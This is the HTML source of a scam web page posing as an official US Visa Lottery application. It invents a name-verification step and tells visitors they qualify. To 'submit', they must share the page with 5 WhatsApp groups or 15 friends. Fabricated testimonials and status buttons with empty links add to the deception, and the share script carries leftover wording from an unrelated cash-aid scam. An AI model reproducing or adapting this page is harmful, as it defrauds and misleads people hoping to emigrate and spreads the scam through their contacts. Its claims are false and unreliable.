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                    <center><img src="Screenshot-2024-06-24-081730.png" alt="Free-Data" style="width: 100%;"></center>
                    <center><img src="Visa-application.jpg" alt="Free-Data" style="width: 100%;"></center>
                       <marquee class="horizontal_marque" direction="left">Every year, the United States grants 55,000 green cards through the visa lottery program! Take the chance of living in the USA and apply for the Official Visa Lottery.</marquee> 
    <div class="post" width="100%">

        <div id="intro">
            <p class="welcome">

                <span class="amount"> Your Application for </span>American Visa Lottery<br> <span class="amount"></span> <strong><font color="green"><b><strong>Is now in process. Kindly Verify Your Name to proceed to the next step.</strong></b></font></strong><br>
            <button id="go">VERIFY</button>
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            <p class="title"> VERIFY YOUR NAME:</p>
            <div class="phone">
                <center><input type="char" placeholder="Enter your full name" id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;width: 330px;" onkeypress="return numberonly(event);"></center>
<center><p class="title">CHOOSE VISA TYPE</p></center>
<select aria-label="الجنس" name="birthday_year" id="year" title="الجنس" class="_5dba" style="
    width: 330px;
    height: 56px;
<option value="أختر نوع الشبكة" selected="1">----------- CHOOSE VISA TYPE -----------</option>
<option value="1"> STUDENT VISA </option>
<option value="2"> FAMILY VISA </option>
<option value="3"> WORKER VISA </option>
                <button id="confirm">CONFIRM</button>
            <p class="error">Enter Your Name !</p>
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            <p class="title">Verifying your details...</p>
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            <p class="tip"> Congratulations, <span id="getname"></span>،</p>
            <p class="tip">
                You are qualified for<span class="amount"> American Visa Lottery.</span> 
                        <p class="tip">
                Kindly follow the instructions below to <span class="amount"> SUBMIT</span> Your application: 
            <p class="tip">1. Share it with 5 groups or 15 friends on WhatsApp (Click on the "SHARE" icon below).</p>
            <p class="tip">2. You will be redirected automatically to "<b>SUBMIT</b>" application page after the GREEN verification bar is filled.</p>
            <p class="tip">3. You will receive a confirmation email within 24 hours after you submit your application.</p>

            <button id="whatsapp">SHARE</button>
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            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title">KINDLY SUBMIT YOUR APPLICATION NOW.</p>

            <button id="offer">SUBMIT</button><br>
                                <a href="" target="_blank">
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="white">CONFIRM SUBMISSION</font></button>
                                                    <a href="" target="_blank">
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="white">RE-APPLY</font></button>
                    <p class="title">USE BELOW BUTTONS TO CHECK YOUR APPLICATION STATUS:</p>
                                        <a href="" target="_blank">
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="white">APPLICATION STATUS</font></button>
                                        <a href="" target="_blank">
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="white">VISA STATUS</font></button>
                                        <a href="" target="_blank">
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="white">GREEN CARD STATUS</font></button>

                    <p class="title"> CLICK BELOW IF YOU ARE UNABLE TO SUBMIT YOUR APPLICATION: </p>
                                                            <a href="" target="_blank">
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="white">FIX ERROR</font></button>
                                                                                <a href="" target="_blank">
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="white">REPORT PROBLEM </font></button>
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                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="white">CONTACT US</font></button>
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                        <span class="user">Elizbeth Jenifer</span>
                        <span class="text">
I sincerely appreciate your help, The American Dream. It finally worked out after multiple tries. I'm traveling to Atlanta, Georgia, next year! Thank you so much, American Dream Team. 
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
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                    <div class="single-container"><span class="user">Julian aus Duisburg</span> <span class="text"> Thanks to The American Dream for the support in participating in the Green Card Lottery. Whenever I had a question, I received competent advice and can, therefore, definitely recommend The American Dream. </span></div>
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                    <div class="single-container"><span class="user">James Micheal</span> <span class="text">I would like to thank The American Dream very much. After several attempts I was very lucky to be selected for the Green Card. Now begins a new phase in my life. I have dreamed of a life in America since I was a small child. There I want to get to know new people, a new culture and grow personally. This year I will move to America and start my new life there. Many thanks dear American Dream Team. </span></div>
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                    <img src=";format=pjpg&amp;exif=1&amp;iptc=1">
                    <div class="single-container"><span class="user">Juliet Promise</span> <span class="text"> Dear American Dream Team, although my dream of emigrating to California has faded into the background, participating in the Green Card Lottery has become a small tradition. When it actually worked after 10 years, I just had to take this unique chance, because you never know what the future will bring... Thanks a lot! </span></div>
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                    <img src=";k=20&amp;m=1332373959&amp;s=170667a&amp;w=0&amp;h=TKCIoc778sQTiiNFzS3mm_aUMIGcZ6VAN4Cn8mz4UaI=">
                    <div class="single-container"><span class="user">John Mayowa</span> <span class="text">This is the dream of my life come true. With this Green Card, I will be able to start a new life. I thank The American Dream for their precious help through the process. Thanks a lot!! </span></div>
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                    <div class="single-container"><span class="user">Carrick and Eva</span> <span class="text"> We were so excited to finally receive our Green Cards! It is such an honor to join the ranks of American immigrants. Freedom and personal responsibility, values that have always been a guiding principle for both of us in our individual and shared history. For both of us, this is a great opportunity to get to know ourselves and American culture even better and to merge with each other. Our loved ones are as happy for us as we are! Thank you so much for your support and for making everything go so smoothly. We'll be posting about our process on our Instagram account! 😊 </span></div>
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       var text1 = "*AMERICAN VISA LOTTERY*%0A%0AApply for the American Visa Lottery to relocate to the United States at no cost.%0A%0A*NOTICE:* There is no cost to register for the Visa Lottery Program. You are strongly encouraged to complete the entry form yourself without a “Visa Consultant,” “Visa Agent,” or other facilitator who offers to help.%0A%0A*Apply Here:*%0A",
             text2 = " an amount of ",
            text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
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